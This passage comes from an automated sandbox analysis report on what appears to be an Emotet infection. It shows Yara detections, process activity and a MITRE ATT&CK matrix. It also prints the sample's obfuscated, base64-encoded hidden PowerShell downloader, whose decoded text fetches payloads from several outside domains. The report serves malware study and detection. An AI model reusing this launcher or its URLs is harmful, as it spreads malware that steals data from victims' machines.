IAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_10001630 EntryPoint,GetUserNameA,CreateMetaFileW,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2230214108.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2305247507.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2179031474.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2239275661.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2193919576.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2260083486.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2283433880.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2318576557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351778015.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2239237660.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2275876666.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2306105928.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2282670574.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2240182511.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.300000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Disable or Modify Tools1OS Credential DumpingAccount Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerSystem Information Discovery15SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSSecurity Software Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell2Rc.commonRc.commonMasquerading11Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
